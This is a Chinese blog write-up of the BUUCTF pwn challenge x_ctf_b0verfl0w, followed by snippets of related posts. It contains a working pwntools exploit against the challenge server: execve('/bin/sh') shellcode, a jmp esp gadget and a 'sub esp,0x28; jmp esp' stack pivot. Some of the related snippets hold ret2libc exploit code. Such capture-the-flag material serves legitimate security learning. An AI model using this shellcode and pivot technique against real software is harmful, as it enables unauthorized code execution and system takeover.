BUUCTF pwn x_ctf_b0verfl0w

最新推荐文章于 2024-06-19 18:15:00 发布
最新推荐文章于 2024-06-19 18:15:00 发布
阅读量746 收藏 5
点赞数 13
分类专栏: pwn 文章标签: 数据库 linux python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zwb2603096342/article/details/139296136
版权

首先:

checksec一下,发现保护全关,并且可写可读可执行,那么便可以直接传入shellcode并执行 

 

接下来看主程序:

 

发现在s这里存在栈溢出,但是这里没有system("/bin/sh"),与我们最开始的想法不谋而合,传入shellcode并且执行。这里fgets向s写入50字节,其中padding占据0x20(32)个字节,除去fake ebp和ret两个8字节,那么便就只剩下10字节写shellcode,这是不够的,那么如何写入shellcode呢?

重点 :

我们可以在栈初始位置就写入shellcode,然后控制程序执行流在栈初始部分,执行shellcode。如何实现控制程序执行流,看下方的栈布局:

shellcode | padding | fake ebp | jmp_esp_address | sub esp,0x28 | jmp esp

主要思路:

栈布局如上,解析一下,栈开头传入shellcode,shellcode的长度要小于0x24,过长会溢出到ret_address,用shellcraft.sh()生成的shellcode长度为0x2c,是过长的,所以我们要自己手搓shellcode,或者可以去这个网站上找:Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers 

前面不足0x24的填满垃圾数据,然后在ret的部分填入jmp_esp_address,ret等同于pop eip,当eip指向jmp_esp_address,便会执行jmp esp,同时由于pop,esp+4, 此时eip指向sub exp,0x28;jmp esp,便执行这段语句,直接回到栈初始位置,执行shellcode。(0x28=0x20+fake_esp+jmp_esp_address)

思路整理完毕,先ROPgadget寻找jmp:

ROPgadget --binary over --only "jmp|ret"
Gadgets information
============================================================
0x080483ab : jmp 0x8048390
0x080484f2 : jmp 0x8048470
0x08048611 : jmp 0x8048620
0x0804855d : jmp dword ptr [ecx + 0x804a040]
0x08048550 : jmp dword ptr [ecx + 0x804a060]
0x0804876f : jmp dword ptr [ecx]
0x08048504 : jmp esp  #就这个
0x0804836a : ret
0x0804847e : ret 0xeac1

 很巧,这里正好有jmp esp,说明我们的思路没错,那么便直接上脚本:

from pwn import *
context(arch='i386',log_level='debug')
jmp_esp = 0x08048504
r=remote('node5.buuoj.cn',25247)

'''
shellcode = b"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
shellcode += b"\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
shellcode += b"\x0b\xcd\x80"
'''
shellcode = b"\x6a\x0b\x58\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
len1 = len(shellcode)
payload = shellcode + (0x24-len1)*b'a'
payload += p32(jmp_esp)
payload += asm('sub esp,0x28')
payload += asm('jmp esp')

r.sendline(payload)
r.interactive()

脚本中有两个shellcode,都是可以的,第一个shellcode参考了这位佬的文章:

 https://www.cnblogs.com/gaonuoqi/p/12674851.html

第二个shellcode在上面那个网站找到的:

 Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) (exploit-db.com)

总结 :

1.首先思路很重要,分析输入的长度限制,shellcode长度受限该怎么办?

2.对于汇编语言的合理运用,合理控制执行流

蒟蒻zwb
关注
  • 13
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF(pwn)x_ctf_b0verfl0w
半岛铁盒的博客
04-01 357
flag的地址有了 execve() – 叫做执行程序函数 就像Python中的os.system(cmd)这个函数,我们可以用这个函数来执行我们的shell脚本,单独的shell命令,或者是调用其他的程序,我们的execve()这个函数就和Python中的os.system函数类似,可以调用其他程序的执行,执行shell命令,,调用脚本等等功能。 from pwn import* flag=0x401157 payload='a'*(0x110+8)+p64(flag) p=remote('..
BUUCTF(pwn)x_ctf_b0verfl0w [ret2libc类型]
半岛铁盒的博客
04-06 400
是ret2libc类型 from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',25524) elf = ELF('./b0verfl0w') puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] main=0x804850e payload='a'*(0x20+4)+p32(puts_plt) + p32(main) +p32(puts_got) p.s.
[BUUCTF-pwn]——x_ctf_b0verfl0w
Y_peak的博客
03-27 548
[BUUCTF-pwn]——x_ctf_b0verfl0w 很简单的一个ret2libc题型,利用栈溢出,构造循环调用 第一次leek地址,之后就可以构造我们想要的rop链了 exploit from pwn import * from LibcSearcher import * #p = process('./b0verfl0w') p = remote('node3.buuoj.cn',26806) elf = ELF('./b0verfl0w') context.log_level = 'debug
[BUUCTF]PWN——x_ctf_b0verfl0w(汇编代码写shellcode+jump esp指令劫持esp)
mcmuyanga的博客
02-04 1191
x_ctf_b0verfl0w 附件 步骤 例行检查,32位程序,开启了RELRO(不可改写got表) 本地试运行一下程序,看看大概的情况 32位ida载入 fgets可以溢出,但是只可以溢出0x32-0x20-0x4=14字节,由于没有开启nx,首先想到的是shellcode,0x20肯定放不进pwntools生成的shellcode,只能自己手写,但是得想办法劫持esp去执行我们的shellcode 在hit函数中找到了jump esp的gadget 因此我们可以构造这样的栈
x_ctf_b0verfl0ww
z1r0的博客
01-11 980
x_ctf_b0verfl0ww 查看保护 有溢出但是空间小不可以ret2libc。没开nx看见不有一个hint 有个jmp esp,这是一个好跳板,可以去看一下0day安全这个书,里面讲到了jmp esp的灵活运用。写shellcode进去,然后通过jmp esp 和 sub esp, xx,jmp esp来执行shellcode即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name
x_ctf_b0verfl0w
qq_62887641的博客
09-19 80
32位,保护全关,写shellcode栈溢出并且有个hit给出了jmp esp。
[BUUCTF]PWN——suctf_2018_basic pwn
mcmuyanga的博客
02-02 541
suctf_2018_basic pwn 附件 步骤 例行检查,64位程序,开启了RELRO和NX 试运行一下程序,看看大概的情况 64位ida载入,检索字符串的时候发现了读出flag的函数,flag_addr=0x401157 main() s存在溢出,简单的覆盖返回地址到后门函数类型的题目 完整exp from pwn import * r=remote('node3.buuoj.cn',25779) flag_addr=0x401157 payload='a'*(0x110+8)+p6
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 367
buuctf pwn 第三页
BUUCTF pwn wp 81 - 85
fa1c4的blog
01-08 2880
wdb_2018_2nd_easyfmt int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[100]; // [esp+8h] [ebp-70h] BYREF unsigned int v4; // [esp+6Ch] [ebp-Ch] v4 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0);
信息安全_CTFPWN题目实例分析.pptx
08-14
"CTFPWN 题目实例分析" CTFPWN 题目实例分析是指在 Capture The Flag(CTF)比赛中,PWN 题目类别的实例分析。PWN 题目是 CTF 比赛中的一种常见题目类型,涉及到二进制漏洞的利用和内存相关的安全问题。 ...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7下PWN接口的使用源码,包含C语言及汇编
PostgreSQL源码分析——CREATE DATABASE
让我思考一下
06-18 598
这里我们分析一下在PostgreSQL中创建数据库的源码,在分析源码之前,最好先阅读《PostgreSQL指南内幕探索》的第一章,数据库集簇、数据库和数据表,弄清其空间布局,理解PG中,数据库、表、元组是怎么布局的。通俗一点说,创建一个数据库相当于创建一个数据目录,在这个目录下,存放该数据库中定义的表、索引等对象。
PostgreSQL源码分析——INSERT
让我思考一下
06-18 317
这里我们对INSERT语句进行分析, 只分析其宏观过程,具体细节后续再分析。我们就分析下面的语句的执行过程。
MySQL修改分隔符
2401_83963227的博客
06-18 221
MySQL修改分隔符
windows桌面运维----第七天
最新发布
2401_83565544的博客
06-19 211
目录 1、运维有哪些方面选择: 2.网络速度慢: 3.无法访问某个网站: 4.无法共享文件或打印机: 5.无法连接VPN:
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值